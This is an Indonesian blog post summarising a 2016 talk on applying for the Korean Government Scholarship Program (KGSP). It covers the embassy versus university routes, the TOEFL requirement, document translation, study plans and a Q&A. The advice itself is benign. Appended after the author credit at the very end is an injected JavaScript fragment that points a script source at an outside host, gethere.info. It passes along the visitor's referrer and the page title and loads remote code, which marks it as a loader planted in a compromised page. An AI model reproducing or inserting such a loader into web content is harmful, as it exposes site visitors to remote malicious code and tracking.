Schotalk #5, 4 Februari 2016
Pemateri : Febriani Elfida (S2 Korean Modern Literature, Seoul National University)

Hai Sobat SB! Kali ini kami mau menyampaikan informasi mengenai kuliah di Korea nih. Materi ini disampaikan oleh Kak Febi pada #schotalk SB chapter Mataram. Nah, sebelum masuk ke materinya kita perkenalkan dulu ya kakak pemateri kita kali ini.

Kak Febriani Elfida yang biasa dipanggil Kak Febi ini adalah lulusan S1 Korean Department di UGM dan saat ini sedang menempuh S2 Korean Modern Literature di Seoul National University. Kak Febi ini juga merupakan Awardee Korean Goverment Scholarship.

Sekarang kita lanjut ke materi utama ya, Sobat! Kak Febi kuliah di Korea ini melalui jalur KGSP (Korean Goverment Scholarship Program). Untuk program dari KGSP ini ada dua jenis yaitu untuk Undergraduate dan Graduate. Di antara pertanyaan yang sering ditanyakan antara lain: Apa sih perbedaan KGSP melalui jalur Embassy dan melalui jalur Universitas? Syaratnya menggunakan TOEFL atau tidak? Apakah ijazah dan dokumen lain harus diterjemahkan ke dalam bahasa Inggris? Bagaimana cara membuat study plan yang bagus?

Perbedaan KGSP yang melalui jalur Embassy dan Universitas itu terletak di cara pendaftarannya, kalau melalui jalur Embassy itu dengan mendaftarkan diri ke Kedubes Korea di Indonesia dan mendapat 3 pilihan universitas yang menjadi target sobat SB yang ingin mendaftar sedangkan kalau melalui jalur universitas dengan mendaftar ke universitas yang diinginkan.

Urutan tahapannya sebagai berikut:

  • Melalui Jalur Embassy : Tahap 1 > screening dokumen dan wawancara dengan pihak di Kedubes. Tahap 2 > screening di NIIED (Pemberi beasiswa). Tahap 3 > Screening di Universitas yang menjadi tujuan Sobat SB.
  • Melalui Jalur Universitas : perbedaan dengan jalur Embassy terletak pada tahap 1, yang melalui jalur universitas bisa langsung mendaftarkan diri ke universitas masing-masing tujuan tanpa melalui lagi tahap ketiga pada jalur Embassy.

Jika sobat SB telah lolos tahap kedua pada jalur Embassy masih harus melewati tahap selanjutnya untuk diseleksi oleh universitas masing-masing yang menjadi tujuan. Dan untuk sobat SB yang dinyatakan lolos pada tahap kedua melalui jalur universitas tinggal menunggu waktu keberangkatan which means, you get the Scholarship, Sobat!

Untuk persyaratan mengenai TOEFL ini sudah pasti menjadi persyaratan utama untuk daftar beasiswa ya sobat. KGSP memberikan nilai skor minimal untuk TOEFL ini yaitu sebesar 550. Nah untuk TOEFL yang diterima oleh pihak KGSP ini yaitu berupa TOEFL ITP/TOEFL IBT/IELTS jangan menggunakan TOEFL Preparation ya.

Persyaratan mengenai ijazah dan dokumen lainnya sebaiknya sudah diterjemahkan ke dalam bahasa Inggris ya sobat dan sudah dilegalisir juga oleh kampus/notaris. Dan untuk selanjutnya, bagaimana dengan study plan? Saran dari Kak Febi yaitu buat dengan semenarik mungkin mengenai apa yang ingin kamu pelajari di Korea dan hal-hal apa saja yang kamu ingin dapatkan disini. Intinya, coba aja dengan menggunakan imajinasi dan kreatifitasmu Sobat karena kita tidak akan tahu sebelum kita mencoba.

Q&A:

Q : Kalau kita mau mendaftar beasiswa KGSP, ijazah yang mana yang kita pakai? Untuk kita yang belum lulus kuliah dan contoh dokumennya seperti apa saja? Kalau menggunakan ijazah SMA apa harus dilegalisir dari SMA atau kampus?
A : Biasanya kalau belum lulus tapi sudah akan lulus by the time kita ke Korea, bisa dimintakan surat keterangan dari Universitas. Soalnya banyak dulu yang seperti itu, jadi nanti surat keterangannya diterjemahkan lalu dilegalisir. Dan nanti ketika sudah wisuda bisa menyusulkan ijazah dan transkrip kita. Tapi ingat harus sudah lulus seblum kita berangkat ya, jadi misalnya sudah sidang ketika mendaftar.

Q : Untuk yang di kampusnya tidak ada jurusan bahasa korea bagaimana ya, Kak? Kalau mau daftar KGSP harus lewat embassy ya, Kak?
A : Oh boleh banget buat daftar. KGSP bukan hanya untuk bahasa korea aja. Kalau misalnya sekarang jurusan HI lalu ingin daftar KGSP bisa ambil jurusan HI nya. Ini tidak terbatas hanya untuk jurusan bahasa/sastra korea aja tapi buat semua jurusan. Kalau lewat embassy boleh, lewat universitas juga boleh. Biasanya di websitenya ada daftar universitas yang buka lowongan untuk tahun ini. Saya lupa pastinya kalo ga salah studyinkorea.go.kr. Atau tulis aja KGSP 2016 di Google, nanti keluar kok.

Q : Apakah beasiswa KGSP meng-cover semua biaya termasuk biaya kuliah dan biaya hidup? Apakah ada prioritas jurusan tertentu yang akan mendapatkan beasiswa KGSP? Saat ini di korea tinggal di mana?
A : KGSP adalah full scholarship :) Meng-cover semua termasuk biaya kuliah dan hidup. Tidak ada prioritas untuk diterima di KGSP, semua jurusan sama setau saya. Saat ini saya tinggal di asrama dalam kampus. Ohya, kalau di Korea harga kamar mahal kalau di luar asrama karena harus ada deposit meskipun lebih banyak fasilitasnya. Tapi asrama juga kadang ada yg terjangkau juga :).

Q : apa sih kepanjangan NIIED itu? Oh iya, apa maksud dari “screening” pada tahapan seleksi itu ya kak? kan tadi kakak jelasin ada screening pada beberapa tahapan itu baik dari Embassy ataupun Universitas. Terus ada ujian masuk ke universitas yang kita tuju apa tidak ya?
A : National Institute of Education kalau tidak salah. Screening itu proses seleksi dokumen. Kalau ujian masuk nggak ada biasanya yg lewat universitas langsung wawancara sama pihak universitasnya langsung. Kalau dari Embassy hanya dokumen aja :).

Ada sedikit pesan juga dari Kak Febi nih, Sobat. Semoga bisa memotivasi buat sobat-sobat semua yang mau sekolah di luar negeri tidak hanya di Korea. Pesan dari Kak Febi, “Live your dream! Bermimpilah. Maka dari itu, berusahalah dan jangan lupa berdoa karena yang keputusan ada di tangan Yang Di Atas. Jangan menyerah ya dan sampai jumpa di Seoul. Fighting!”

Demikian materi #schotalk kali ini mengenai studi di Korea melalui beasiswa KGSP. Semoga bermanfaat dan dapat membangkitkan semangat teman-teman untuk meraih beasiswa di luar negeri ya.

Terima kasih. Wassalam! :)

(Nida/SB)s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

About the author

Media SB